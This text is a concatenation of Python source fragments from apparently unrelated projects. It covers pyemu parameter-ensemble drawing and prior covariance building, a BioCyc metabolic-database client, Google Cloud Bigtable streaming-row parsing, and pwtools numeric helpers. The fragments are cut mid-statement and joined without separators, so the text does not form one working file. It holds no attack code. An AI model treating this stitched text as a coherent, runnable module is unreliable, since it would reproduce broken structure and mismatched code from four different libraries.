                through to `pyemu.Cov.from_parameter_data`. Default is True.
Note: operates on parameters by groups to avoid having to construct a very large covariance matrix for problems with more the 30K parameters. uses `helpers.geostatitical_draw()` Returns: `pyemu.ParameterEnsemble`: The realized parameter ensemble """ self.log("drawing realizations") struct_dict = {} gr_par_pe = None if self.pp_suffix in self.par_dfs.keys(): pp_df = self.par_dfs[self.pp_suffix] pp_dfs = [] for pargp in pp_df.pargp.unique(): gp_df = pp_df.loc[pp_df.pargp == pargp, :] p_df = gp_df.drop_duplicates(subset="parnme") pp_dfs.append(p_df) # pp_dfs = [pp_df.loc[pp_df.pargp==pargp,:].copy() for pargp in pp_df.pargp.unique()] struct_dict[self.pp_geostruct] = pp_dfs if self.gr_suffix in self.par_dfs.keys(): gr_df = self.par_dfs[self.gr_suffix] if not use_specsim: gr_dfs = [] for pargp in gr_df.pargp.unique(): gp_df = gr_df.loc[gr_df.pargp == pargp, :] p_df = gp_df.drop_duplicates(subset="parnme") gr_dfs.append(p_df) # gr_dfs = [gr_df.loc[gr_df.pargp==pargp,:].copy() for pargp in gr_df.pargp.unique()] struct_dict[self.grid_geostruct] = gr_dfs else: if not pyemu.geostats.SpecSim2d.grid_is_regular( self.m.dis.delr.array, self.m.dis.delc.array ): self.logger.lraise( "draw() error: can't use spectral simulation with irregular grid" ) gr_df.loc[:, "i"] = gr_df.parnme.apply(lambda x: int(x[-6:-3])) gr_df.loc[:, "j"] = gr_df.parnme.apply(lambda x: int(x[-3:])) if gr_df.i.max() > self.m.nrow - 1 or gr_df.i.min() < 0: self.logger.lraise( "draw(): error parsing grid par names for 'i' index" ) if gr_df.j.max() > self.m.ncol - 1 or gr_df.j.min() < 0: self.logger.lraise( "draw(): error parsing grid par names for 'j' index" ) self.log("spectral simulation for grid-scale pars") ss = pyemu.geostats.SpecSim2d( delx=self.m.dis.delr.array, dely=self.m.dis.delc.array, geostruct=self.grid_geostruct, ) gr_par_pe = ss.grid_par_ensemble_helper( pst=self.pst, gr_df=gr_df, num_reals=num_reals, sigma_range=sigma_range, logger=self.logger, ) self.log("spectral simulation for grid-scale 
pars") if "temporal_list" in self.par_dfs.keys(): bc_df = self.par_dfs["temporal_list"] bc_df.loc[:, "y"] = 0 bc_df.loc[:, "x"] = bc_df.timedelta.apply(lambda x: x.days) bc_dfs = [] for pargp in bc_df.pargp.unique(): gp_df = bc_df.loc[bc_df.pargp == pargp, :] p_df = gp_df.drop_duplicates(subset="parnme") # print(p_df) bc_dfs.append(p_df) # bc_dfs = [bc_df.loc[bc_df.pargp==pargp,:].copy() for pargp in bc_df.pargp.unique()] struct_dict[self.temporal_list_geostruct] = bc_dfs if "spatial_list" in self.par_dfs.keys(): bc_df = self.par_dfs["spatial_list"] bc_dfs = [] for pargp in bc_df.pargp.unique(): gp_df = bc_df.loc[bc_df.pargp == pargp, :] # p_df = gp_df.drop_duplicates(subset="parnme") # print(p_df) bc_dfs.append(gp_df) struct_dict[self.spatial_list_geostruct] = bc_dfs pe = geostatistical_draws( self.pst, struct_dict=struct_dict, num_reals=num_reals, sigma_range=sigma_range, scale_offset=scale_offset, ) if gr_par_pe is not None: pe.loc[:, gr_par_pe.columns] = gr_par_pe.values self.log("drawing realizations") return pe def build_prior( self, fmt="ascii", filename=None, droptol=None, chunk=None, sigma_range=6 ): """build and optionally save the prior parameter covariance matrix. Args: fmt (`str`, optional): the format to save the cov matrix. Options are "ascii","binary","uncfile", "coo". Default is "ascii". If "none" (lower case string, not None), then no file is created. filename (`str`, optional): the filename to save the prior cov matrix to. If None, the name is formed using model nam_file name. Default is None. droptol (`float`, optional): tolerance for dropping near-zero values when writing compressed binary. Default is None. chunk (`int`, optional): chunk size to write in a single pass - for binary only. Default is None (no chunking). sigma_range (`float`): number of standard deviations represented by the parameter bounds. Default is 6. 
Returns: `pyemu.Cov`: the full prior parameter covariance matrix, generated by processing parameters by groups """ fmt = fmt.lower() acc_fmts = ["ascii", "binary", "uncfile", "none", "coo"] if fmt not in acc_fmts: self.logger.lraise( "unrecognized prior save 'fmt':{0}, options are: {1}".format( fmt, ",".join(acc_fmts) ) ) self.log("building prior covariance matrix") struct_dict = {} if self.pp_suffix in self.par_dfs.keys(): pp_df = self.par_dfs[self.pp_suffix] pp_dfs = [] for pargp in pp_df.pargp.unique(): gp_df = pp_df.loc[pp_df.pargp == pargp, :] p_df =
xml) self.cache(obj) # Will cache either a real object, or a BioCycEntityNotFound if obj: # Found objs.append(obj) else: # Not found (BioCycEntityNotFound) objs.append(None) if t != list: return objs[0] else: return objs def create_obj_from_xml(self, id, xml): # Get the object type from the returned XML # by matching the provided lists for schema-id for o in AVAILABLE_OBJECT_TYPES: if o.xml_schema_id: x = xml.find(o.xml_schema_id) if x: # Found it # Create the base object, populating from the xml # Import the xml to the object (using object specific import_from_xml) obj = o( id=id, from_xml=x) return obj else: return BioCycEntityNotFound(id, self.org_id) def biocyc_obj_url(self, obj): return "http://www.biocyc.org/%s/NEW-IMAGE?object=%s" % (self.org_id, obj) biocyc = BioCyc() class BioCycEntityNotFound(object): def __init__(self, id=None, org_id=None, *args, **kwargs): self.type = type(self).__name__.lower() self.id = id self.org_id = org_id self.created_at = datetime.now() def __bool__(self): return False def __nonzero__(self): return False # Global Pathomx db object class to simplify object display, synonym referencing, etc. 
class BioCycEntityBase(object): xml_schema_id = None ipython_attribs = [ ('Name', 'name_as_html'), ('BioCyc ID', 'biocyc_link_html'), ('Org ID', 'org_id'), ('Synonyms', 'synonyms'), ('INCHI', 'inchi'), ('Molecular weight', 'molecular_weight'), ('Gibbs 0', 'gibbs0'), ('Parents', '_parents'), ('Instances', '_instances'), ('Reactions', '_reactions'), ('Pathways', '_pathways'), ('Super pathways', '_super_pathways'), ('Species', '_species'), ('Taxonomic range', '_taxonomic_range'), ('Database links', 'dblinks_link_html')] def __init__(self, id=None, from_xml=None, *args, **kwargs): self.type = type(self).__name__.lower() self.id = id # Parent and child relationships self._parents = [] self._instances = [] self.name = None self.name_as_html = None self.synonyms = [] self.dblinks = {} # Timestamp object on creation self.created_at = datetime.now() if from_xml: self.import_from_xml(from_xml) def __unicode__(self): if self.name: return self.name else: return self.id def __str__(self): return self.__unicode__() def __repr__(self): return self.__unicode__() def _repr_html_(self): rows = [] for l, attr in self.ipython_attribs: val = getattr(self, attr, None) if val: # Manipulate to text if type(val) == list: val = ', '.join(val) elif type(val) == dict: val = ', '.join( ['%s: %s' % (k,v) for k,v in val.items() ] ) rows.append('<tr><th>%s</th><td>%s</td></tr>' % (l, val) ) return "<table>" + ''.join(rows) + "</table>" def __eq__(self, other): return type(other) == type(self) and self.type == other.type and self.id == other.id def __hash__(self): return hash( (self.type, self.id) ) @property def cachepath(self): return os.path.join(self.org_id, self.type, self.id) @property def url(self): return 'http://biocyc.org/%s/NEW-IMAGE?type=%s&object=%s' % (self.org_id, self.type, self.id) def import_from_xml(self, xml): ''' Standard imports for all types of object These must fail gracefully, skip if not found ''' self._import_orgid(xml) self._import_parents_from_xml(xml) 
self._import_instances_from_xml(xml) self._import_common_name(xml) self._import_synonyms(xml) self._import_dblinks(xml) def _import_orgid(self, xml): self.org_id = xml.attrib['orgid'] def _import_parents_from_xml(self, xml): parents = xml.iterfind('parent') for p in parents: for o in p: # Store a tuple of orgid, identifier self._parents.append( o.attrib['frameid'] ) #( o.attrib['orgid'], ) ) def _import_instances_from_xml(self, xml): instances = xml.iterfind('instance') for p in instances: for o in p: # Store a tuple of orgid, identifier self._instances.append( o.attrib['frameid'] ) #( o.attrib['orgid'], ) ) def _import_common_name(self, xml): e = xml.find('common-name') if e is not None: self.name_as_html = e.text self.name = to_plain_text(self.name_as_html) def _import_synonyms(self, xml): es = xml.iterfind('synonym') for e in es: self.synonyms.append(e.text) if self.name is None and self.synonyms: self.name_as_html = self.synonyms[-1] # Apply last synonym if common name not defined self.name = to_plain_text(self.name_as_html) def _import_dblinks(self, xml): es = xml.iterfind('dblink') for e in es: #<dblink-db>LIGAND-CPD</dblink-db><dblink-oid>C00186</dblink-oid> self.dblinks[ e.find('dblink-db').text ] = e.find('dblink-oid').text def _import_inchi(self, xml): self._set_var_from_xml_text( xml, 'inchi', 'inchi') def _import_molecular_weight(self, xml): self._set_var_from_xml_text( xml, 'molecular-weight', 'molecular_weight') def _import_gibbs0(self, xml): self._set_var_from_xml_text( xml, 'gibbs-0', 'gibbs0' ) def _import_reactions(self, xml): self._set_list_ids_from_xml_iter(xml, 'appears-in-right-side-of/Reaction', 'reactions_in_right') self._set_list_ids_from_xml_iter(xml, 'appears-in-left-side-of/Reaction', 'reactions_in_left') def _import_reaction_list(self, xml): self._set_list_ids_from_xml_iter(xml, 'reaction-list/Reaction', '_reactions') def _import_super_pathways(self, xml): self._set_list_ids_from_xml_iter(xml, 'super-pathways/Pathway', 
'_super_pathways') def _import_pathways(self, xml): self._set_list_ids_from_xml_iter(xml, 'in-pathway/Pathway', '_pathways') def _import_species(self, xml): self._set_list_ids_from_xml_iter(xml, 'species/Organism', '_species') def _import_taxonomic_range(self, xml): self._set_list_ids_from_xml_iter(xml, 'taxonomic-range/Organism', '_taxonomic_range') def _set_var_from_xml_text(self, xml, xmlpath, var): ''' Sets a object variable from the xml if it is there and passing it through a data conversion based on the variable datatype ''' xmle = xml.find(xmlpath) if xmle is not None: setattr(self, var, type_converter[ xmle.attrib.get('datatype', 'string') ]( xmle.text )) def _set_list_ids_from_xml_iter(self, xml, xmlpath, var): ''' Set a list variable from the frameids of matching xml entities ''' es = xml.iterfind(xmlpath) if es is not None: l = [] for e in es: l.append( e.attrib['frameid'] ) setattr(self, var, l) def _set_id_from_xml_frameid(self, xml, xmlpath, var): ''' Set a single variable with the frameids of matching entity ''' e = xml.find(xmlpath) if e is not None: setattr(self, var, e.attrib['frameid']) @property def parents(self): return biocyc.get_for_org( self.org_id, self._parents ) @property def instances(self): return biocyc.get_for_org( self.org_id, self._instances ) @property def dblinks_link_html(self): db = {} for k,v in self.dblinks.items(): if k in DBLINK_URLS: db[k] = '<a href="%s">%s</a>' % (DBLINK_URLS[k] % v,v) else: db[k] = v return db @property def biocyc_link_html(self): return '<a href="%s">%s</a>' % (biocyc.biocyc_obj_url(self.id), self.id ) class Compound(BioCycEntityBase): xml_schema_id = 'Compound' localstore = 'compounds' def __init__(self, *args, **kwargs): self.inchi = '' self.molecular_weight = None self.gibbs0 = None self.reactions_in_right = [] self.reactions_in_left = [] super(Compound, self).__init__(*args, **kwargs) def import_from_xml(self, xml): super(Compound, self).import_from_xml(xml) self._import_inchi(xml) 
self._import_molecular_weight(xml) self._import_gibbs0(xml) self._import_reactions(xml) @property def _reactions(self): return self.reactions_in_right + self.reactions_in_left @property def reactions(self): return biocyc.get_for_org( self.org_id, self._reactions ) @property def pathways(self): return [p for r in self.reactions for p in r.pathways] class Pathway(BioCycEntityBase): xml_schema_id = 'Pathway' localstore = 'pathways' def __init__(self, *args, **kwargs): self._parent = None self._reactions = [] self._species = [] self._super_pathways = [] self._instances = [] self._subclasses = [] self._taxonomic_range = [] super(Pathway, self).__init__(*args, **kwargs) def import_from_xml(self, xml): super(Pathway, self).import_from_xml(xml) self._import_parent(xml) self._import_instances(xml) self._import_subclasses(xml) self._import_reaction_list(xml) self._import_species(xml) self._import_super_pathways(xml) self._import_taxonomic_range(xml) @property def parent(self): return biocyc.get_for_org( self.org_id, self._parent ) @property def instances(self): return biocyc.get_for_org( self.org_id, self._instances ) @property def subclasses(self): return biocyc.get_for_org( self.org_id, self._subclasses ) @property def compounds(self): return [c for r in clean(self.reactions) for c in clean(r.compounds)] @property def reactions(self): return biocyc.get_for_org( self.org_id, self._reactions ) @property def species(self): return biocyc.get_for_org( self.org_id, self._species ) @property def super_pathways(self): return biocyc.get_for_org( self.org_id, self._super_pathways ) @property def taxonomic_range(self): return biocyc.get_for_org( self.org_id, self._taxonomic_range ) def _import_parent(self, xml): self._set_id_from_xml_frameid(xml, 'parent/Pathway', '_parent') def _import_instances(self, xml): self._set_list_ids_from_xml_iter(xml, 'instance/Pathway', '_instances') def _import_subclasses(self, xml): self._set_list_ids_from_xml_iter(xml, 'subclass/Pathway', 
'_subclasses') class Reaction(BioCycEntityBase): xml_schema_id = 'Reaction' localstore = 'reactions' def __init__(self, *args, **kwargs): self._pathways = [] self._compounds_left = [] self._compounds_right = [] self._enzymatic_reactions = [] super(Reaction, self).__init__(*args, **kwargs) def import_from_xml(self, xml): super(Reaction, self).import_from_xml(xml) self._import_enzymatic_reaction_objects(xml) self._import_pathways(xml) self._import_compounds_left(xml) self._import_compounds_right(xml) self._import_reaction_direction(xml) @property def compounds_left(self): return biocyc.get_for_org( self.org_id, self._compounds_left ) @property def compounds_right(self): return biocyc.get_for_org( self.org_id, self._compounds_right ) @property def compounds(self): return self.compounds_left + self.compounds_right @property def enzymatic_reactions(self): return biocyc.get_for_org( self.org_id, self._enzymatic_reactions ) @property def enzymes(self): return clean([er.enzyme for er in clean(self.enzymatic_reactions)]) @property def pathways(self): return biocyc.get_for_org( self.org_id, self._pathways ) def _import_enzymatic_reaction_objects(self, xml): # The EnzymaticReaction data in the Reaction XML contains all the information we need # to create an EnzymaticReaction object, despite being detail=low. 
# Auto-create them here to avoid unnecessary request enzyme_reaction_list = [] for er in xml.iterfind('enzymatic-reaction/Enzymatic-Reaction'): id = er.attrib['frameid'] enzyme_reaction_list.append(id) obj = EnzymaticReaction( id=id, from_xml=er) biocyc.cache(obj) self._enzymatic_reactions = enzyme_reaction_list def _import_compounds_left(self, xml): self._set_list_ids_from_xml_iter(xml, 'left/Compound', '_compounds_left') def _import_compounds_right(self, xml): self._set_list_ids_from_xml_iter(xml, 'right/Compound', '_compounds_right') def _import_reaction_direction(self, xml): self._set_var_from_xml_text( xml, 'reaction-direction', 'direction') class EnzymaticReaction(BioCycEntityBase): xml_schema_id = 'Enzymatic-Reaction' localstore = 'enzymaticreactions' def __init__(self, *args, **kwargs): self._enzyme = None self._reaction = None super(EnzymaticReaction, self).__init__(*args, **kwargs) def import_from_xml(self, xml): super(EnzymaticReaction, self).import_from_xml(xml) self._import_enzyme(xml) self._import_reaction(xml) def _import_enzyme(self, xml): self._set_id_from_xml_frameid(xml, 'enzyme/Protein', '_enzyme') def _import_reaction(self, xml): self._set_id_from_xml_frameid(xml, 'reaction/Reaction', '_reaction') @property def enzyme(self): return biocyc.get_for_org( self.org_id, self._enzyme ) @property def reaction(self): return biocyc.get_for_org( self.org_id, self._reaction ) @property def pathways(self): return self.reaction.pathways class Protein(BioCycEntityBase): xml_schema_id = 'Protein' localstore = 'proteins' def __init__(self, *args, **kwargs): self._parent = None self._gene = None self._location = None self._components = [] # Subunits self._complexes = [] # Subunits of self._catalyzes = [] self.component_coefficient = None super(Protein, self).__init__(*args, **kwargs) def import_from_xml(self, xml): super(Protein, self).import_from_xml(xml) self._import_parent(xml) self._import_gene(xml) self._import_components(xml) self._import_complexes(xml) 
self._import_enzymatic_reactions(xml) @property def parent(self): return biocyc.get_for_org( self.org_id, self._parent ) @property def gene(self): return biocyc.get_for_org( self.org_id, self._gene ) @property def genes(self): # Including subunits genes = [c.gene for c in clean(self.components)] if self.gene is not None: genes += [self.gene] return genes @property
# Copyright 2016 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Container for Google Cloud Bigtable Cells and Streaming Row Contents.""" import copy import six from google.cloud._helpers import _datetime_from_microseconds from google.cloud._helpers import _to_bytes class Cell(object): """Representation of a Google Cloud Bigtable Cell. :type value: bytes :param value: The value stored in the cell. :type timestamp: :class:`datetime.datetime` :param timestamp: The timestamp when the cell was stored. :type labels: list :param labels: (Optional) List of strings. Labels applied to the cell. """ def __init__(self, value, timestamp, labels=()): self.value = value self.timestamp = timestamp self.labels = list(labels) @classmethod def from_pb(cls, cell_pb): """Create a new cell from a Cell protobuf. :type cell_pb: :class:`._generated.data_pb2.Cell` :param cell_pb: The protobuf to convert. :rtype: :class:`Cell` :returns: The cell corresponding to the protobuf. 
""" timestamp = _datetime_from_microseconds(cell_pb.timestamp_micros) if cell_pb.labels: return cls(cell_pb.value, timestamp, labels=cell_pb.labels) else: return cls(cell_pb.value, timestamp) def __eq__(self, other): if not isinstance(other, self.__class__): return False return (other.value == self.value and other.timestamp == self.timestamp and other.labels == self.labels) def __ne__(self, other): return not self.__eq__(other) class PartialCellData(object): """Representation of partial cell in a Google Cloud Bigtable Table. These are expected to be updated directly from a :class:`._generated.bigtable_service_messages_pb2.ReadRowsResponse` :type row_key: bytes :param row_key: The key for the row holding the (partial) cell. :type family_name: str :param family_name: The family name of the (partial) cell. :type qualifier: bytes :param qualifier: The column qualifier of the (partial) cell. :type timestamp_micros: int :param timestamp_micros: The timestamp (in microsecods) of the (partial) cell. :type labels: list of str :param labels: labels assigned to the (partial) cell :type value: bytes :param value: The (accumulated) value of the (partial) cell. """ def __init__(self, row_key, family_name, qualifier, timestamp_micros, labels=(), value=b''): self.row_key = row_key self.family_name = family_name self.qualifier = qualifier self.timestamp_micros = timestamp_micros self.labels = labels self.value = value def append_value(self, value): """Append bytes from a new chunk to value. :type value: bytes :param value: bytes to append """ self.value += value class PartialRowData(object): """Representation of partial row in a Google Cloud Bigtable Table. These are expected to be updated directly from a :class:`._generated.bigtable_service_messages_pb2.ReadRowsResponse` :type row_key: bytes :param row_key: The key for the row holding the (partial) data. 
""" def __init__(self, row_key): self._row_key = row_key self._cells = {} def __eq__(self, other): if not isinstance(other, self.__class__): return False return (other._row_key == self._row_key and other._cells == self._cells) def __ne__(self, other): return not self.__eq__(other) def to_dict(self): """Convert the cells to a dictionary. This is intended to be used with HappyBase, so the column family and column qualiers are combined (with ``:``). :rtype: dict :returns: Dictionary containing all the data in the cells of this row. """ result = {} for column_family_id, columns in six.iteritems(self._cells): for column_qual, cells in six.iteritems(columns): key = (_to_bytes(column_family_id) + b':' + _to_bytes(column_qual)) result[key] = cells return result @property def cells(self): """Property returning all the cells accumulated on this partial row. :rtype: dict :returns: Dictionary of the :class:`Cell` objects accumulated. This dictionary has two-levels of keys (first for column families and second for column names/qualifiers within a family). For a given column, a list of :class:`Cell` objects is stored. """ return copy.deepcopy(self._cells) @property def row_key(self): """Getter for the current (partial) row's key. :rtype: bytes :returns: The current (partial) row's key. """ return self._row_key class InvalidReadRowsResponse(RuntimeError): """Exception raised to to invalid response data from back-end.""" class InvalidChunk(RuntimeError): """Exception raised to to invalid chunk data from back-end.""" class PartialRowsData(object): """Convenience wrapper for consuming a ``ReadRows`` streaming response. :type response_iterator: :class:`~google.cloud.exceptions.GrpcRendezvous` :param response_iterator: A streaming iterator returned from a ``ReadRows`` request. """ START = "Start" # No responses yet processed. 
NEW_ROW = "New row" # No cells yet complete for row ROW_IN_PROGRESS = "Row in progress" # Some cells complete for row CELL_IN_PROGRESS = "Cell in progress" # Incomplete cell for row def __init__(self, response_iterator): self._response_iterator = response_iterator # Fully-processed rows, keyed by `row_key` self._rows = {} # Counter for responses pulled from iterator self._counter = 0 # Maybe cached from previous response self._last_scanned_row_key = None # In-progress row, unset until first response, after commit/reset self._row = None # Last complete row, unset until first commit self._previous_row = None # In-progress cell, unset until first response, after completion self._cell = None # Last complete cell, unset until first completion, after new row self._previous_cell = None def __eq__(self, other): if not isinstance(other, self.__class__): return False return other._response_iterator == self._response_iterator def __ne__(self, other): return not self.__eq__(other) @property def state(self): """State machine state. :rtype: str :returns: name of state corresponding to currrent row / chunk processing. """ if self._last_scanned_row_key is None: return self.START if self._row is None: assert self._cell is None assert self._previous_cell is None return self.NEW_ROW if self._cell is not None: return self.CELL_IN_PROGRESS if self._previous_cell is not None: return self.ROW_IN_PROGRESS return self.NEW_ROW # row added, no chunk yet processed @property def rows(self): """Property returning all rows accumulated from the stream. :rtype: dict :returns: row_key -> :class:`PartialRowData`. """ # NOTE: To avoid duplicating large objects, this is just the # mutable private data. return self._rows def cancel(self): """Cancels the iterator, closing the stream.""" self._response_iterator.cancel() def consume_next(self): """Consume the next ``ReadRowsResponse`` from the stream. 
    Parse the response and its chunks into a new/existing row in :attr:`_rows` """
        response = six.next(self._response_iterator)
        self._counter += 1
        # Only the very first response may legitimately precede any
        # recorded scan position; a scanned-key there is a protocol error.
        if self._last_scanned_row_key is None:  # first response
            if response.last_scanned_row_key:
                raise InvalidReadRowsResponse()
        self._last_scanned_row_key = response.last_scanned_row_key
        row = self._row
        cell = self._cell
        for chunk in response.chunks:
            self._validate_chunk(chunk)
            if chunk.reset_row:
                # Server asked us to discard all partial state for this row.
                row = self._row = None
                cell = self._cell = self._previous_cell = None
                continue
            if row is None:
                row = self._row = PartialRowData(chunk.row_key)
            if cell is None:
                # First chunk of a new cell: seed it, then fill in any
                # fields omitted because they repeat the previous cell.
                cell = self._cell = PartialCellData(
                    chunk.row_key,
                    chunk.family_name.value,
                    chunk.qualifier.value,
                    chunk.timestamp_micros,
                    chunk.labels,
                    chunk.value)
                self._copy_from_previous(cell)
            else:
                # Continuation chunk: the value arrives in pieces.
                cell.append_value(chunk.value)
            if chunk.commit_row:
                self._save_current_row()
                row = cell = None
                continue
            if chunk.value_size == 0:
                # value_size == 0 marks the final chunk of a cell's value.
                self._save_current_cell()
                cell = None

    def consume_all(self, max_loops=None):
        """Consume the streamed responses until there are no more.

        This simply calls :meth:`consume_next` until there are no more to
        consume.

        :type max_loops: int
        :param max_loops: (Optional) Maximum number of times to try to consume
                          an additional ``ReadRowsResponse``. You can use this
                          to avoid long wait times.
        """
        curr_loop = 0
        if max_loops is None:
            max_loops = float('inf')
        while curr_loop < max_loops:
            curr_loop += 1
            try:
                self.consume_next()
            except StopIteration:
                break

    @staticmethod
    def _validate_chunk_status(chunk):
        """Helper for :meth:`_validate_chunk_row_in_progress`, etc."""
        # No reset with other keys
        if chunk.reset_row:
            _raise_if(chunk.row_key)
            _raise_if(chunk.HasField('family_name'))
            _raise_if(chunk.HasField('qualifier'))
            _raise_if(chunk.timestamp_micros)
            _raise_if(chunk.labels)
            _raise_if(chunk.value_size)
            _raise_if(chunk.value)
        # No commit with value size
        _raise_if(chunk.commit_row and chunk.value_size > 0)
        # No negative value_size (inferred as a general constraint).
        _raise_if(chunk.value_size < 0)

    def _validate_chunk_new_row(self, chunk):
        """Helper for :meth:`_validate_chunk`.

        A chunk that starts a brand new row must carry the full cell
        coordinates (row key, family, qualifier) and must not reset.
        """
        assert self.state == self.NEW_ROW
        _raise_if(chunk.reset_row)
        _raise_if(not chunk.row_key)
        _raise_if(not chunk.family_name)
        _raise_if(not chunk.qualifier)
        # This constraint is not enforced in the Go example.
        _raise_if(chunk.value_size > 0 and chunk.commit_row is not False)
        # This constraint is from the Go example, not the spec.
        _raise_if(self._previous_row is not None and
                  chunk.row_key <= self._previous_row.row_key)

    def _same_as_previous(self, chunk):
        """Helper for :meth:`_validate_chunk_row_in_progress`"""
        # True when the chunk addresses the same cell coordinates
        # (key/family/qualifier/labels) as the previously completed cell.
        previous = self._previous_cell
        return (chunk.row_key == previous.row_key and
                chunk.family_name == previous.family_name and
                chunk.qualifier == previous.qualifier and
                chunk.labels == previous.labels)

    def _validate_chunk_row_in_progress(self, chunk):
        """Helper for :meth:`_validate_chunk`"""
        assert self.state == self.ROW_IN_PROGRESS
        self._validate_chunk_status(chunk)
        # Mid-row chunks may omit the row key, but must not contradict it.
        _raise_if(chunk.row_key and
                  chunk.row_key != self._row.row_key)
        _raise_if(chunk.HasField('family_name') and
                  not chunk.HasField('qualifier'))
        # Within the same cell coordinates, timestamps must strictly increase.
        previous = self._previous_cell
        _raise_if(self._same_as_previous(chunk) and
                  chunk.timestamp_micros <= previous.timestamp_micros)

    def _validate_chunk_cell_in_progress(self, chunk):
        """Helper for :meth:`_validate_chunk`"""
        assert self.state == self.CELL_IN_PROGRESS
        self._validate_chunk_status(chunk)
        self._copy_from_current(chunk)

    def _validate_chunk(self, chunk):
        """Helper for :meth:`consume_next`.

        Dispatch to the validator for the current parser state.  The
        states are mutually exclusive, so at most one branch runs
        (assuming the validators do not change ``self.state`` — they do
        not appear to).
        """
        if self.state == self.NEW_ROW:
            self._validate_chunk_new_row(chunk)
        if self.state == self.ROW_IN_PROGRESS:
            self._validate_chunk_row_in_progress(chunk)
        if self.state == self.CELL_IN_PROGRESS:
            self._validate_chunk_cell_in_progress(chunk)

    def _save_current_cell(self):
        """Helper for :meth:`consume_next`.

        Freeze the in-progress cell into a completed ``Cell`` and file it
        under its family/qualifier on the in-progress row.
        """
        row, cell = self._row, self._cell
        family = row._cells.setdefault(cell.family_name, {})
        qualified = family.setdefault(cell.qualifier, [])
        complete = Cell.from_pb(self._cell)
        qualified.append(complete)
        # Remember the completed cell so omitted fields of the next
        # chunk can be copied from it.
        self._cell, self._previous_cell = None, cell

    def _copy_from_current(self, chunk):
        """Helper
# --- truncated in source: tail of ``extend_array`` (its ``def`` line and the
# start of its docstring lie before this chunk, so it is not reproduced) ---


def sum(arr, axis=None, keepdims=False, **kwds):
    """numpy.sum() with two extensions back-ported for old numpy versions:
    ``axis`` may be a tuple of axes, and there is a ``keepdims`` keyword
    whose meaning differs from numpy's.

    Parameters
    ----------
    arr : nd array
    axis : None or int or tuple of ints, optional
        Axis or axes along which a sum is performed.  The default
        (``axis=None``) sums over all dimensions.  Negative values count
        from the last axis.
    keepdims : bool, optional
        If True, the selection is *inverted*: the sum runs over every axis
        NOT listed in ``axis``, so the named axes survive.  Note this is
        not numpy's ``keepdims`` (which keeps reduced axes as size-1
        dimensions).
    **kwds : passed to np.sum() on the fast paths.
    """
    def _reduce(work, axes_left):
        # Sum over the first requested axis; every remaining axis index
        # above the removed one shifts down by one, then recurse.
        if not axes_left:
            return work
        first = axes_left.pop(0)
        shrunk = work.sum(axis=first)
        renamed = [a - 1 if a > first else a for a in axes_left]
        return _reduce(shrunk, renamed)

    if axis is None:
        if keepdims:
            raise Exception("axis=None + keepdims=True makes no sense")
        return np.sum(arr, axis=axis, **kwds)

    if isinstance(axis, int):
        if not keepdims:
            # Plain single-axis sum: defer straight to numpy.
            return np.sum(arr, axis=axis, **kwds)
        tosum = [axis]
    elif isinstance(axis, (tuple, list)):
        tosum = list(axis)
    else:
        raise Exception("illegal type for axis: %s" % str(type(axis)))

    if keepdims:
        # Invert: sum over every axis not named in `axis`.
        tosum = [a for a in range(arr.ndim) if a not in tosum]
    return _reduce(arr, tosum)


# --- truncated in source: ``class Interpol2D`` header and the opening of its
# class docstring continue past this chunk ---
""" def __init__(self, points=None, values=None, xx=None, yy=None, dd=None, what='rbf_inv_multi', **initkwds): """ Parameters ---------- points : (npoints, 2) values : (npoints, 1) xx,yy : (npoints, 1) Use either `points` + `values` or `xx` + `yy` + `values` or `dd`. dd : pwtools.mpl.Data2D instance what : str, optional which interpolator to use | 'rbf_multi' : RBFN w/ multiquadric rbf, see :class:`~pwtools.rbf.Rbf` | 'rbf_inv_multi' : RBFN w/ inverse multiquadric rbf | 'rbf_gauss' : RBFN w/ gaussian rbf | 'poly' : :class:`PolyFit` | 'bispl' : scipy.interpolate.bispl{rep,ev} | 'ct' : scipy.interpolate.CloughTocher2DInterpolator | 'linear' : scipy.interpolate.LinearNDInterpolator | 'nearest' : scipy.interpolate.NearestNDInterpolator **initkwds : keywords passed on to the interpolator's constructor or fit() method (RBF case) Notes ----- Despite the name "Interpol2D", the RBF methods 'rbf_*' as well as 'poly' are actually fits (least squares regression). You can force interpolation with the RBF methods using the ``r=0`` keyword (see :meth:`pwtools.rbf.Rbf.fit`), which will use ``scipy.linalg.solve`` without regularization. The methods 'ct', 'linear' and of course 'nearest' can be inaccurate (see also ``test/test_interpol.py``). Use only for plotting, not for data evaluation, i.e. accurate minimas etc. Except for 'bispl', all interpolators do actually work in ND as well, as does :meth:`get_min`. Possible keywords (examples): | rbf : | p='mean' [,r=None] (default) # linalg.lstsq | p='scipy', r=1e-8 # linalg.solve w/ regularization | p=3.5, r=0 # linalg.solve w/o regularization | ct : | tol = 1e-6 (default) | bispl : | s = 1e-4 | kx = 3, ky = 3 (default) | nxest, nyest | poly : | deg = 5 Examples -------- >>> from pwtools import num, mpl >>> x=linspace(-5,5,20) >>> y=x >>> X,Y=np.meshgrid(x,y); X=X.T; Y=Y.T >>> Z=(X+3)**2+(Y+4)**2 + 5 >>> dd=mpl.Data2D(X=X,Y=Y,Z=Z) >>> fmt="what: {:15} target: [5,30] result: {}" >>> for method in ['rbf_multi', 'rbf_inv_multi', ... 
